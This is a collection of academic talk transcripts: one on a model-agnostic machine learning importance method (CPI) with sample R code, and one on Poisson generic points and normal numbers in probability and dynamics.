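library(cpi)       # install from GitHub; not on CRAN at the time of the talk
library(mlr)
library(ggplot2)

# Boston Housing ships with mlr as bh.task; as described above, the two-level
# factor is converted to a binary numeric variable beforehand.

# Random forest (ranger), loss estimated by 10-fold cross-validation
res_rf <- cpi(task = bh.task,
              learner = makeLearner("regr.ranger", num.trees = 500),
              resampling = makeResampleDesc("CV", iters = 10))

# Support vector machine with a radial kernel, 5 times repeated subsampling
res_svm <- cpi(task = bh.task,
               learner = makeLearner("regr.ksvm", kernel = "rbfdot"),
               resampling = makeResampleDesc("Subsample", iters = 5))

# Bar plot with standard errors (result column names are assumptions)
ggplot(res_svm, aes(x = Variable, y = CPI)) +
  geom_col() +
  geom_errorbar(aes(ymin = CPI - SE, ymax = CPI + SE), width = 0.3)
```

The error bars are the point of the exercise here, given how much a single importance ranking can change from one run to the next.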
And it's, I think, quite important to get variability estimates for that. Okay, to conclude: our conditional predictive impact is a model-agnostic method. So you can plug in any machine learning method you want to. It can be as simple as the linear model. But it can also be a fancy deep learning algorithm. You don't have to refit it. You just have to predict again. So even if you have a complicated deep learning method, the CPI will be quite fast, because prediction is fast in neural networks. As we've seen, it's conditional. So you can adjust for confounders and handle correlations. And I think that's very, very important if you really want to interpret, especially in epidemiology, any effects, be it an effect of a gene on a disease or be it lifestyle factors; you always have to adjust for confounders. And that's actually not possible if you use the standard interpretability methods. You can do statistical testing without permutations or bootstrapping. And so far we have applied that to low-dimensional tabular data. So that's kind of what we have seen with the Boston Housing data. We also did that on other data sets. In the paper, we also have an example that's already quite high-dimensional, on gene expression data. And a recent thing, that's not in the paper and also not published yet, is the application to genome-wide data. But this Gaussian knockoff sampler won't work for genome-wide data. So there we have several hundred thousand variables. But there's a hidden Markov knockoff sampler, which we can use there. And that's also, I think, a nice feature: if you want to go for a new application where the other knockoff samplers won't work, you can plug in any new or different knockoff sampler. You just have to find one that fits the data at hand. And for the future, a very important thing we have to find a solution for is to handle categorical data. So this genetic data is kind of categorical, but this is a very specific application. But in general, the knockoffs have been mostly proposed for continuous data, not for categorical ones. And one solution could be dummy coding, but that also has some problems. And the next step in that direction is then mixed data. So if you have categorical and continuous data in the same data set, as in reality you usually have. So that's, I think, for the application, a very, very important point to add. And we can also look at local importance. So that means, as I said, you do the statistical testing over the sample-wise loss. So you could quite easily look at local importance. So you get the loss for every person, as you usually have in an epi data set. And then you could look at subgroups of persons and only calculate the effect for a subgroup. And a technical step we have to do is to also add support for MLR3. So you maybe have heard, if you have used MLR, that there's a new version and the old one is not really developed any further. So it would be good to also add support for the new MLR package. Okay. Thank you for listening. And now I'm open for questions. Yes. Thank you, Marvin. And so, yes, that was a really great talk, and on time. So it gives us a lot of time to ask you questions. So I'm opening the floor. Please, if you have a question, you can either write it on the chat or just turn on the microphone and ask the question directly. Well, I have a sort of question, I think. Please. I use R a fair amount for modeling.
And one of the things we sometimes have to do is, if one is, if I am producing something for a continent, let's say, I have to subdivide the areas into zones and then do separate random forest models for each. And I have trouble combining them, combining, I mean, getting any, some sort of idea apart from the standard sensitivity or whatever and specificity. I have trouble combining the results of all these different models into one sort of overview of the sort that you're suggesting. Is your framework amenable to that? Can you or not? So you could fit a model on the whole data and then in the just in the interpretation part. Yeah. I mean, essentially, we would, it's a matter of combining the results from several different models. If you have a model for a continent, let's say, I would do maybe 10 models for different zones. Those zones may not be a country, they may be, let's say, landings, forest or cultivation. So they interlock, which makes it quite difficult to play with. So I'm interested to know whether it's possible to to identify, get some sort of overall identification of the different confounders, as you call them, by combining the results from the different models. I have no idea. I've always had trouble with RF from that point of view. And I wonder if your methodology would be more amenable to that. Actually, that's, I would say that depends on the underlying machine learning method, because our method is kind of post hoc. So you can choose whatever machine learning method you want. You have your model, and you might have already tested it for prediction performance and all that. And then you want to look at the important factors for the prediction, or maybe even interpret the facts in there. Okay. Okay. Time for more questions, please. So just to just to confirm, Marvin, so that you made the package called CPI. And that comes with this publication that you submitted with your colleague, right? Yes. Maybe tell us this package is still not on the ground, but how much is it ready to be used? I just put the link to the chat, if you're interested. I forgot it on the slide, but it's also in the paper. And I think it's ready to use. And is it optimized for large data set? Is it very computational? So the computational part would be the refitting here with the resampling method. But you don't, as I've said, you don't have to refit. So it's not very computational. If you don't have a model which takes very long to predict. So Tom, you know that the random forests can take some time to predict. And for example, neural networks are very fast in prediction. But usually it's not such a big issue. The computation time, the computation time for the resampling, what is an issue is the computation time for the knockoffs. So if you have low dimensional data, it's usually quite fast. But if you have high dimensional data, it takes some time. So for example, on the gene expression data set, it took, I think, 48 hours to calculate the knockoffs without parallel computation and all that. So that could be optimized, but it still took some time. But I think the knockoffs are improving, very much improving, and there will be better knockoff procedures in the future also for high dimensional data. Okay, can you go to slide 12? Sure. So like the new, I mean, the method that you introduced is the one on the right, the right plot. I see that the confidence bands are really narrow, they're more narrow than on the linear model. 
And so is this also some kind of over-optimistic confidence interval, because the lower one is really narrow, I mean, literally like there's no uncertainty. So is there some overfitting happening? That's what I'm trying to ask. Or have you done a test of how accurate the confidence intervals are? So actually, these are not confidence intervals, these are just box plots of simulation replicates. Okay, okay, sorry, then I misunderstood that. And you see that here for the linear model, this one is quite small, and this one is big, and here it's the other way around. Actually, I haven't really thought about that. I might have to investigate why here it's always zero, because it could also be always zero here, because this should also be perfectly conditional. We started with the typical machine learning tasks, so these benchmarking data sets such as Boston Housing. But actually the reason to develop such a method was genetic data. But it turned out, as I've explained, that the method is very general. So in general, it makes sense as soon as you have correlated data to use the CPI or, in general, a conditional method. And you could ask a researcher, do you have correlations in your data? And I guess it will be hard to find someone who says no. So I would say the field of application is very, very broad. So it's maybe not only model agnostic, but also application agnostic. But you have to find a knockoff sampler that works with your data. And that's not always easy. So for example, the one for the genome-wide data, we were lucky that it was already there. So we didn't have to develop it ourselves. But yeah, new knockoff methods or knockoff samplers are proposed all the time. So it seems to be a very active research topic. So that will then also broaden the scope of the CPI, because we completely rely on the knockoffs. It's not working yet for categorical or mixed data, except some special cases like binary variables, or on genetic data it's working with this one specific type of knockoff sampler. But in general, that's a major challenge to solve. It's useful if you have non-linear or high dimensional data. So images, speech or text, that's where machine learning is a big plus. But also just if you have big data sets. And if we go back to my genetic example, what you usually do is the univariate regression model. So you take each genetic variant, calculate the regression model on the outcome, and maybe adjust for some confounders to get an effect estimate. But that completely misses any relations between the genetic variants. That's why we want to use a multivariate method. But a multivariate regression won't work, because then you have these multicollinearity issues, you have more variables than observations, and the model does not fit. So it's not working. And that's then where machine learning might come into play. But then you have your multivariate model. So you apply your random forest to your genome-wide data. But then in the end, it's not actually multivariate again if you don't have a conditional importance measure, if you want to look at the importance of the genetic variants. And yeah, that's one case which can be solved with the CPI method. The typical examples are, as I've explained, always on prediction. And I think these are big applications of machine learning.
So for example, you want to do risk prediction, or you want to do personalized medicine and give treatment which is personalized to a specific person. And I think machine learning is very useful for these. But there are also many smaller things which are maybe not so well known or just very specific. So for an example, maybe going back to the genetic example, genetic epidemiology, you use machine learning for risk prediction. So you might have some sequence data or some gene expression data and you want to predict someone's risk for a disease. And you might also want to use interpretability methods as I described to find genetic variants which are associated with the disease. So this is all I think well known and one of the well known applications of machine learning and epidemiology. But they also if you look at in the sequence data, if you look at the bioinformatics tool chain used to pre-process the data, there are so many very, very small steps where also machine learning comes into play. And that's often overlooked. So you often just look at these major prediction applications. But also there's obviously a hype on machine learning. And I think machine learning cannot solve all the problems sometimes start off. So if our goal in the end is to understand the disease or to understand risk factors, we still need statistics and we also still need epidemiology. So machine learning is a tool that can help us but it's not like the AI which solves all the problems for us.
|
Marvin, Computer Engineer and Biostatistician, is the head of the Emmy Noether research group on interpretable machine learning, funded by the German Research Foundation, at the Leibniz Institute for Prevention Research and Epidemiology – BIPS in Bremen, Germany. Since February 2021, he has also been Professor of Machine Learning in Statistics at the University of Bremen. He has a research focus on statistical learning and interpretable machine learning and is interested in epidemiological applications to high-dimensional genetic data and longitudinal register data. Marvin is also author of several R packages, including the random forest package ranger. Marvin presented the results of his latest paper, just accepted in the Machine Learning journal, explaining the conditional predictive impact (CPI), a model-agnostic interpretable machine learning method which can handle correlated predictor variables and adjust for confounders. The method builds on the knockoff framework of Candès et al. (2018) and works in conjunction with any valid knockoff sampler, supervised learning algorithm, and loss function. Marvin briefly described the method, showed selected simulation results and gave an example (with R code) of the application. The CPI has been implemented in an R package, cpi, which can be downloaded from this https URL.
|
10.5446/13930 (DOI)
|
I thank you. I thank all of those who are listening. The talk is based on joint work with Yuval Peres, and the next slide will explain a little more. So the work is not new. We did this about 20 years ago, just before Yuval left Jerusalem for Berkeley. The trigger for this work was a talk at our seminar by Zeev Rudnick. He spoke about a joint paper of his with Alexandru Zaharescu on the distribution of spacings between fractional parts of lacunary sequences. Or it might have been some other work of his on the distribution of spacings; my memory is not that good. Over the years I've spoken about this work several times, and I apologize to those who have heard this before. I can only remind you of what I heard years ago as part of advice being given to speakers, especially to young speakers: never underestimate the pleasure that people get in hearing things that they already know. You're probably quite familiar with this. When you go to a concert you often enjoy more hearing a piece of music that you've heard before. In the opposite direction, I'm going to recycle what I once included in a long paper that I wrote with the late Dan Rudolph and with Matt Foreman. In explanation we can do no better than to quote the historian of science George Sarton, who wrote a multi-volume history of science: As far as scientific matters are concerned, I try to say enough to refresh the reader's memory but do not attempt to provide complete explanations, which would be equally unbearable to those who know and to those who do not. Okay, so after these apologies I'll start with the talk itself. I assume that people know the usual notion of normality, and normality is expressed either for points in zero one or for sequences of zeros and ones which represent the point in base two. What it says is that we look at the empirical distribution of the k blocks; these are blocks of consecutive digits of length k, and the empirical distribution means you count how many times a k block occurs up to the nth digit, divided by n, and let n tend to infinity while k is fixed. And this should converge to 2 to the minus k, which is the Lebesgue measure of these blocks. When you think of the measure preserving transformation of the unit interval given by multiplication by two mod one, this is the usual notion of generic points in dynamics. I'll come back to that a little bit later and explain a little bit more about that. Borel, more than a hundred years ago, in 1909, proved that almost every point in zero one represents a normal sequence, and this was the first instance of the strong law of large numbers. Another of the basic theorems in probability is that when you take sums of independent random variables where the probability of each of these random variables is very small, on the order of one over n, then this will converge in distribution to a Poisson random variable. This is called the Poisson limit theorem. You can see this if you take a random book of 500 pages and you count the number of errors on each page, and then count how many pages had no errors, how many pages had one error, how many pages had two errors; this usually corresponds to a Poisson distribution, assuming that the book has had a reasonable proofread. Here the sums of the independent variables are not normalized by dividing by n.
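In symbols, the two ingredients just recalled look like this (a sketch; b is the base, and x_1 x_2 x_3 ... are the digits of the point x):

```latex
% Normality in base b: for every block w of length k,
\[ \lim_{n\to\infty} \frac{1}{n}\,\#\{\, 0 \le i < n : x_{i+1} x_{i+2} \cdots x_{i+k} = w \,\} = b^{-k} \]
% Poisson limit theorem: if S_n is a sum of n independent indicator variables,
% each with success probability lambda/n, then for every fixed j,
\[ \Pr(S_n = j) \;\longrightarrow\; \frac{\lambda^{j}}{j!}\, e^{-\lambda} \qquad (n \to \infty) \]
```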
So a natural question to ask is, when you see a sequence of zeros and ones, can you generate a Poisson random variable out of this? Perhaps this can be done in several ways, but we were led to the following definition, and since everything works just as well when you deal with b digits, we'll work with b digits. So what are we going to do? We're going to take Omega to the k, which are the blocks of length k consisting of digits from 0 to b minus 1. So the size of this probability space is b to the k, and you put the uniform probability measure, so each omega gets the mass b to the minus k. On this space we define a random variable, after we fix a point x, an infinite sequence of digits (okay, so I can use the little red button or whatever, I don't know what you see), and we define the random variables M sub k super x of omega, and this just counts, up to b to the k minus 1, how many times you see omega. You need a little bit more than the first b to the k digits to see this, but nonetheless whether or not you count the last blocks is irrelevant, and we say that a point is simply Poisson generic if in distribution these random variables converge to the standard Poisson random variable with mean 1. What this means is that we have a sequence of finite probability spaces, these are the Omega k with their measures, and we've defined on them random variables depending on x; these are the M sub k super x. Convergence in distribution simply means that for all integers j the probability that M k super x is equal to j converges to 1 over j factorial times e to the minus 1; in particular, when j is equal to 0, this is simply e to the minus 1, and that simply means that the proportion of k blocks in the first b to the k digits which do not appear at all is converging to e to the minus 1. So instead of testing all k blocks we're doing something much more mild, we're just counting how many times blocks appear. Now why is this interesting? The first thing that we prove is that this kind of innocent looking convergence implies normality; it's a stronger condition than normality, and I have here an informal proof of this fact. This is going, I think, a little slower than I expected, but whatever, we'll manage. We begin by showing that sequences that are simply Poisson generic are normal. Now here's some handy notation: x 1 super n is the initial block of length n. Fix a d and an epsilon. You first find an m0 such that for any m bigger than m0 the distribution of d blocks in x 1 super m is within epsilon of the uniform distribution on Omega d. You apply the weak law of large numbers to find a k0 so that for any k bigger than k0 the set of omega in Omega to the k such that the empirical distribution of d blocks in omega is within epsilon over 10 of mu d has measure at least one minus epsilon. So you do two things: you first find an m such that the distribution of d blocks in x 1 super m is close, and then you want that these d blocks occur with very high frequency. Next you choose an l which is going to be a cutoff, so that for a standard Poisson random variable the probability that you're bigger than l is less than epsilon over 10. The Poisson distribution decays very rapidly, it decays like one over l factorial, so this doesn't have to be very large; and the same cutoff works for the expectation. Now if x is simply Poisson generic you find a k1 bigger than this k0 so that the distribution of our random variable is very close to the distribution of y. Now what happens is that when you look at any m bigger than b to the k1, when you compute the distribution of d blocks in x 1 super m, you first choose k so that m is between b to the k and b to the k plus one. Now, with high frequency, the k blocks belong to A k; A k was this good set which had very high measure, and in this good set the empirical distribution of d blocks is very good. It's easy to find a disjoint collection of these which covers the same large fraction, and you can calculate the distribution of d blocks within these good blocks to get the conclusion. So the idea is that because we know that we're covering our space, most of the first m digits, with these good k blocks, we automatically get a good distribution of the d blocks, and we get normality. And because we're doing this in such an explicit way, there are classic estimates for the error in the law of large numbers, and you can strengthen normality for these simply Poisson generic points: you can find a sequence k n tending to infinity so that the distribution of k n blocks in x 1 up to b to the n (this should be b to the n and not 2 to the n; I suddenly dropped back to just two digits here) tends to the uniform distribution, and here we deal with the variational norm. I mean, this is a refinement. The clock is running, I see, and I do have some more things to say, so I'm going to continue.
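To keep the definition straight, here is the object just described written out (a sketch in the talk's notation; exactly where the count stops, at b^k or a little before, is irrelevant, as noted above):

```latex
% Omega_k = {0,1,...,b-1}^k with the uniform measure, each block of mass b^{-k}.
\[ M_k^{x}(\omega) = \#\{\, 1 \le j \le b^{k} : x_j x_{j+1} \cdots x_{j+k-1} = \omega \,\}, \qquad \omega \in \Omega_k \]
% x is simply Poisson generic if, for every fixed integer j >= 0,
\[ \Pr\big( M_k^{x} = j \big) \;\longrightarrow\; \frac{1}{j!}\, e^{-1} \qquad (k \to \infty) \]
```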
Now what happens is that when you look at any m bigger than b to the k1 when you compute the distribution of d blocks in x1 m you first choose k so that m is between b to the k and b to the k minus one. Now with frequency of the k blocks that belong to ak, ak was this good set which had a very high measure and in this good set the empirical distribution of d blocks is very good. It's easy to find the disjoint collection of these which covers the same large fraction and you can calculate the distribution of d blocks within these good blocks to get the conclusion. So the idea is that because we know that we're covering our space our space with most of the m blocks with most of these k blocks then we automatically are getting a good distribution of the d we are in normal and because we're doing this in such an explicit way there are classic estimates for the error in the law of large numbers and you can strengthen normality for these simply plus on generic points you can find the sequence tending to infinity so that the distribution of k n blocks in x1 this should be not 2 to the n but b to the n if we're doing yeah this was here I suddenly dropped back to just two digits 10 to the uniform distribution and here we deal with the variational norm I mean this is a refinement that time the clock is running I see and I do have some more things to say so I'm going to continue. Now this notion of simply plus on generic is stronger than normality it's not difficult to see that some normal numbers are not plus on generic already champ pronouns number which consists in concatenating the natural numbers written in base d b one after the other and here the numbers of size b to the k when you get to write these out they appear in the region of indexes where indices where you're at k b to the k this because you're writing them out one after the other each one takes k bits consecutive numbers of k digits are almost identical as k blocks you change the low the the low digits the digits on the right you change them very slowly so there are very long repetitions when you form the statistics of blocks of length k plus log bk this is what we should be checking when we're out at k b to the k we should be checking the logarithm of this number which is k plus the log of k to base b we typically see blocks where the initial string of length log bk coincides with the final string of the same length these are far from being typical and you see mostly typical blocks and so these this just won't work you won't see you'll get the wrong get something very far from a possible distribution and in fact you can do more you can take any normal number and modify it on a zero density sequence you just have to change n blocks on runs of length say twice log n putting twice log n consecutive zeros this is a rare thing for an n block and given as normal number you just change the digits between b to the n and b to the n plus one in blocks of size two n with a periodicity of n over two then you're going to guarantee that any n block has a run of two log n consecutive zeros this is a rare event and but the density of changes is zero and you've killed the you've preserved the normality but you've killed this property property of being plus on generic so our main theorem is that the bagel most every number is simply plus on generic it's not only simply plus on generic it's there's a stronger notion which we'll give in the next slide one of the puzzles and the 20 years have not enabled us to settle this is that we don't know of any 
explicit construction which will give a Poisson generic, even a simply Poisson generic, number. You don't see how many slides I have; in the format that I've chosen I have a little more than 20, so we're getting to more or less halfway through, for those who are worried about where we are in the lecture (I mean, you don't see the total number). Here are some references; the slides are available. I'm not going to say very much about them, you can check these references; there's lots of work on normality, there's a book on this, this is a broad subject, and we really don't have time to go into a detailed discussion of these things. Here I made another comment, which, okay, I think I leave you as a kind of exercise to read, and maybe I'll come back to that if we have time at the end. So let me get to the definition of Poisson generic. So far I just showed you how you get a single Poisson random variable as a limit; we actually get not just one Poisson random variable, but a Poisson point process on the line. So this may be a little less familiar. The Poisson point process on the line, on zero to infinity or on minus infinity to infinity (we'll be discussing just the half line), is intuitively a random distribution of points on the line. To describe this formally one usually talks about a random integer-valued measure Y on the line: for any bounded Borel set S the value of Y of S is a non-negative integer, this is just counting the number of points in S; if you have disjoint Borel sets then these random variables are mutually independent, the numbers of points in disjoint sets are independent; and for each bounded Borel set S, Y of S has the distribution of a Poisson random variable with parameter equal to the Lebesgue measure of S. In the formula I gave you before there was no parameter, it was one; for a parameter lambda you have to put in lambda to the k over k factorial times e to the minus lambda instead of e to the minus one. Okay, here's what I explained, a little more. Now I'm going to explain how we construct not just random variables on our finite probability space; we're going to use this finite probability space to construct an entire process on the line. And the process that we define on the line is: you fix the set S, you scale it by b to the k, and then you count how many times, for j in this scaled set, the block starting at position j is equal to omega. So if S is the unit interval we're simply counting the j from one up to b to the k; if it's the interval from 0 to t we would be counting up to b to the k times t, we would be going further. In other words, we count the number of indices in the scaled set at which the pattern appears. Take a deep breath and swallow this. Now, I've said this already, this was simply Poisson generic, and the new definition is that we say a point is Poisson generic, not simply Poisson generic, if we have convergence of these point processes to the standard Poisson point process on the line, convergence in distribution. And I'll soon give you a criterion; I mean, it may not be so clear what you need to do to prove that processes converge, but we'll see that on the next slide. And the main theorem is that for almost every x in the unit interval these processes defined on these finite probability spaces converge to the standard Poisson process on R; standard means that the expected number of points in an interval is simply equal to the length of the interval. And to prove the theorem we're going to use a proposition that goes back to Rényi. Rényi showed that in order to characterize a Poisson point
process on the line to know whether or not it's Poisson it suffices that satisfies two properties one is that the expected number of mks is bounded by the expected number of the Poisson process in our case it would just be the measure of s and the limit that there are no points in s is just the probability that the Poisson process has no points which is just here's the simple example under these two conditions the point okay xk should be mk this x is a typo for m and when you take for s to be the interval from zero to t it's just e to the minus t which is the probability that a Poisson variable with parameter t is equal to zero so this is the main condition that one has to check in the next couple of slides i'm going to in the next couple of slides i'm going to give a brief sketch of how to prove the theorem theorem is a point wise result in statistical mechanics and probability theory these are called quenched results and this is to be distinguished from an annealed result where one randomizes the point x as well as the block omega and the way to prove the theorem is we first prove an annealed version and here's the lemma that states this we now use a much bigger measure space we take product measure on here i put in z it should be n doesn't matter because the x that we're taking is a one-sided sequence so on this bigger probability space the same random variables that we're defining the same process converges to a standard Poisson process and this is the proof of this lemma is more or less standard in this is a kind of standard thing in probability i won't be able to describe to show you the proof of this but this is not a very difficult result and now we have to go past from this annealed result to a quenched result and for this we use a concentration inequality which estimates the error from the average behavior this enables us to prove to apply the usual Borel Cantelli lemma so i give here some more details of the proof of the lemma and let me explain the concentration inequality because that's a less familiar thing a concentration inequality is a generalization of what i referred to as Bernstein's inequality before and it goes like this the specific one that we need is you have independent random variables but now you take some function of these random variables and this function should satisfy the property that if you take two elements which differ in a single coordinate then the function is bounded by c this is a kind of Lipschitz condition and then for any t the probability that the function differs from its expected value differs from its expected value the probability that this deviates by more than t is an exponential in minus t squared over two c squared n so so you see how i think there's a typo here as well the n should be upstairs not downstairs okay so once you have this kind of concentration inequality let me go back two steps once you have this once you have this kind of concentration inequality you know that the probability that we have to we needed to show that this probability is equal to zero for a finite union of intervals we need to show that it's converging to e to the minus t we know that it's doing it a few randomize over x and so what you need is the deviation from that probability to be an error which is sufficiently small so that you can sum over all k when you sum over all k if that sum is finite you can apply the borough cantelli lemma and get that eventually you are not in the error set and you're converging to the correct thing so after this brief 
discussion of of i i want to pass to a more dynamical point of view and here i'm changing a little bit gears because i now want to focus on the dynamical aspect to this i've already said that uh looking at the transformation t equals bx mod one preserves the big measure one of the classic measure preserving systems although it's not invert in general a point is called the generic point here's the general definition if you have a mapping of a compact space you call a point x0 at the generic point if the ergodic average is converged to the integral the transformation t of x equals b times x this is the usual definition of normal numbers this explains why we call this plus zone generic now from the dynamical point of view dividing into bins or intervals of size b to the minus k is not so natural it's more natural to divide the unit interval into n equal intervals and look at the orbit up to n and therefore we consider the following for each point x we fix x as before now divide n into intervals of length one over n omega now represents a random number from one to n instead of a random block up to b to the k and n n sub n super x of omega counts the number of indices i from one to n such that t to the ix is equal lands in the omega's interval now if you consider omega to be uniformly distributed on the integers from one to n this becomes a random variable our previous m and x was just this but using b to the n and in a similar way you can define a point process you just scale the n up to t and you just count the number of times up to n times t that the orbit lands in this transformation now t to the i is just b to the i we're just using the definition just using the notation now and just using this notation t of x is b times x so with this we now have a new theorem for almost every x we have that this converges to the standard Poisson process and this is a generalization of the previous theorem because if you look at the times b to the k then this is the previous definition and here's the annealed version and the proof goes through the same the same mantra and the proof i was describing before now why did i put this suddenly into a dynamical setting i put this in a dynamical setting because this suggests that instead of multiplication by b we can use other mappings and i think this is the more interesting novelty in our work and the next simplest example you might disagree with this but i i'm thinking of the next simplest example of a hyperbolic system the simplest example of a measure preserving transformation is probably rotation by alpha on the circle but if you want to get some randomness you really need to go to the torus and if you want an invertible transformation and the simplest example is an eucaric otomorphism of the torus this is given by an element of sl2z this is just a two by two integer value matrix with determinant one with eigenvalues that are not roots of unity you need this in order to ensure that the eigenvalues that you have hyperbolic behavior otherwise you have some periodicity it's not an interesting transformation do you know that by a such an otomorphism you could think of the simplest matrix that you like two two one one one for example is probably the simplest one and now fix a point on the torus on the two torus three change divide the torus into n squared equal size square so this is just a checkerboard pattern now omega denotes one of these squares chosen uniformly now we define a process just like we were doing before x is the fixed point n is the length of the 
orbit t is the parameter for the process and when you evaluate it on this finite probability space which now has n squared elements it's the number of indices between l and n squared such that a to the lx is in omega so the probability this is measure preserving the probability that you land in any square at any given time is exactly one over n square so the expected number of times you land in a given square is one so we now have something which we we're sort of summing we're summing not quite not independent but we're summing n square variables each of them with probability one over n squared we expect that the sum that the sum behaves like a Poisson random variable and as expected for almost every point we can prove that these processes converge to the standard Poisson process on the line now this is already going I think beyond the strengthening of normality that I was emphasizing in the first part of the talk I'm supposed to remember yeah 12 20 okay so there are many papers with Poisson limit laws for dynamical systems these usually concentrate on distribution of return times or visits times of a randomly chosen point to a sequence of sets that shrink down to a fixed point here the basic sample space is the whole torus rather than finite set of n square these are maybe not so familiar and so among the first paper of these type was a paper by Boris Pitzke it was actually published after he passed away he passed away tragically at a young age and a special case of his result I'm going to formulate here that a be hyperbolic toral oremorphism that means that the eigenvalues are not on the unit circle so for a two for the two torus it just means that you have to avoid roots of unity you fix a point in the torus y and then you let the n of y denote the ball of radius r to the n around y r is less than one you take some fixed radius and you start shrinking this now with this fixed point that you've chosen x you look at the number of times that your orbit ai to the x lands in the ball of radius r to the n around y and the time that you go is you take a lambda as a parameter and you divide by the measure of the set m denotes the Lebesgue measure if x is m distributed for m almost every y and m almost every x I should have said that as well I'm sorry x is m distributed for m almost every y y is fixed and x is the random point my x converges in distribution to a cross zone variable with parameter lambda so this is the so the y is fixed and the sample space is the whole torus so this is a kind of a kneeled version now I didn't formulate pitzkel's real theorem his real theorem was for finite state Markov chains and he proved the same kind of result for finite state Markov chains there you don't use simply blocks because blocks don't have equal sizes you use sets that are roughly equal that are defined by blocks of roughly equal length and then to go from the Markov chain theorem to the theorem on hyperbolic torulomorphisms to use the fact that there are geometric Markov partitions for hyperbolic torulomorphisms these are partitions of the torus into piecewise polygons piecewise rectangles and these Markov partitions are used to show that the algebraic torulomorphism is isomorphic to a Markov chain so it behaves measure theoretically just like the Markov chain that you get from this representation so you prove the result for Markov chains then use Markov partitions and approximate the square these balls you approximate them with sets in the Markov chain and with that you prove the pitzkel's theorem 
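For reference, the special case of Pitskel's theorem just described can be stated compactly as follows. This is reconstructed from the spoken formulation above (with the normalization as described in the talk), not quoted from the original paper.

```latex
% Pitskel's theorem, special case as formulated in the talk (reconstruction).
% A is a hyperbolic automorphism of the 2-torus, m is Lebesgue (Haar) measure,
% 0 < r < 1 and lambda > 0 are fixed, and B_n(y) is the ball of radius r^n around y.
\[
N_n^{y}(x)\;=\;\#\Bigl\{\,1\le i\le \frac{\lambda}{m\bigl(B_n(y)\bigr)}\;:\;A^{i}x\in B_n(y)\Bigr\}.
\]
For $m$-almost every $y$: if $x$ is distributed according to $m$, then
\[
N_n^{y}\;\xrightarrow[n\to\infty]{\text{distribution}}\;\mathrm{Poisson}(\lambda).
\]
```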
so this gives a kind of annealed version of what I was claiming on the previous slide I mean it's not exactly that setting but it's similar enough let's see what happened here I went backwards yes I should be going forward it's pitzkel's theorem okay I've gotten to the final remarks okay this is what I wanted to do excuse me for a second yeah okay I do have another slide yeah okay okay nice nice so there are properties of the class of normal numbers that do not seem to be shared by the class of plus on generic points the simplest is the following so I'm going back to discussing the connection between plus on generic points and normal numbers if from a normal number you get a new one by erasing all the digits with an odd index and then contract things so you just look at the even digits the new number is also known you do this the same with a plus on generic point it's not at all clear that the resulting point is again plus on generic because now we're we've cut down by a half the length so we should be looking at distribution of we're looking at every other so these are blocks of length 2n minus 1 that we've taken every other one and we're looking at this up to 2n and it's not clear at all that this uh with this carries over that you do this sampling and you get another plus on generic point the proof I was sketching that plus on generic implies normality carries over to the dynamical setting that I was describing in the previous slide on the torus with the same kind of proof there's no nothing really needs to be added there I've been talking this whole talk about the plus on limit theorem the central limit theorem is probably more well better known than plus on limit theorem there are also point wise versions of this these are called you take identically to attribute random variables with zero mean variance one you normalize the sum by one over square root j so you're now looking at the deviation you expect this to be zero and you're looking at the deviation on the scale of root j you fix a realization of the sequence and you take the integers from one to n as your sample space then but you sample with a proportion over j so you're taking really uh what is called a logarithmic average then the almost sure central limit theorem is the assertion that z omega n converges to the standard Gaussian so this is uh I point this out just so that you know there are other from almost every point you can almost also get in some natural way Gaussian random variable and they're a point wise plus on limit theorems of the same type which are similar to the theorem of pitzkel that I was describing here you can he was taking some he disconnected the point x from the point y the point he was using to uh you you can use the same point and just look at the return times of an initial n block in a fixed sequence and this converges this has a normal distribution plus on limit theorem a needle for almost every block the probability when you do this off the block is similar to the theorem of pitzkel that I was describing in these cases I don't see how to show that a point which satisfies them is a normal number there's another typo okay I think that I have about a minute left and I will conclude here I don't have a slide saying thank you to everybody but I say thank you to everybody and I see that Robert has returned yes so thank you for your talk I hurryed up to be in time at the end of your lecture and of course I could hear your comments on normal numbers which was of course for me of of interest so thank you 
very very much and I see also that there is a list of questions already in the chat okay so I can read them do you see it or wait before before that I should have said at some point that one of the papers I think that I was mentioning uh Robert should know because I think he wrote the math review of that paper yeah yeah that's true okay so now I see questions oh yes of Barak uh he asks whether you can read there are a whole bunch of questions yeah other measures he asks instead of what about other measures instead of Lepeg measure instead of Lepeg measure so in principle in principle if you use uh for almost every point have a base two expansion which is Poisson generic oh okay this is a much much subtler problem it's already uh it's already a subtle question it's already a subtle question for normality I mean this is uh this is something we haven't investigated at all I have no idea offhand okay then a bunch of comments by Veronica Pechia okay okay so the subsequence long squares of two and noris is normal our experimental results show that this subsequence could also be Poisson generic beautiful I would be extremely interested in normality of the subsequence was proved by Milner for larger class it could also be Poisson generic yeah this is concerned with these automatic sequences yeah yeah yeah yeah I I know I mean the two or more say I'm familiar with I would be offhand I mean I can't uh I'm happy to see these comments I assume you learned about Poisson generic from some references in some papers of Kamaya but definition can be given with overlapping occurrences of an oh non overlapping does the same hold for the Poisson generic definition we use the overlapping condition in other words we're counting occurrences we're not we're not asking whether or not the uh I don't I don't I don't know I don't think there would be much difference I don't think there would be much difference but but I really don't know I see the Abe sent me a private communication what is how do I see that yeah maybe this is an answer to your comment that she got the information from Kamaya and maybe she says by Zev Rudnik yes yes yes okay okay she heard it from the very okay thank you thank you yeah are there further questions comments see the next one exactly yes okay okay no there is a further one nice okay shoot a piya okay she's typing I'm is there some way I can see her when she's asking these questions or is that maybe I can maybe all uh uh technical uh administrating the background can manage it yes yes and we get the paper with these results uh you'll be the first to get the paper after we get the paper so the moment I try to make Veronica visible but maybe that's not possible uh I don't know yeah in any event Veronica I ah you can see her no no ah now I see her very good okay I'll be happy to send you to put you first on the list once we get the paper written so far 20 years have passed I hope that it won't be another 20 years but uh I at the moment we don't have a real manuscript I mean we've discussed this spoken about it and so on but uh I'll convey to my co-worker your request in hope that this will encourage us to uh uh to write down finally these results although there are some hints I mean there is a I think the paper of Kamaya that I refer to that I mentioned I think that he gives some idea as to what our proofs are because he says that he uses uh some of our ideas to prove what he's doing in that paper so if you haven't looked at Kamaya's papers I would suggest you look there I hope I've given 
more hints in the talk; it's really not so difficult, it's not... Okay, so, Veronica, do you have other questions? No? We don't hear you, you're muted. Veronica, we don't hear you, you have to unmute. I don't have more questions at the moment; I will be pleased to send you the statistics on the examples. Which are wonderful, wonderful. Yeah, please do. Okay, so thank you very much, and... okay.
|
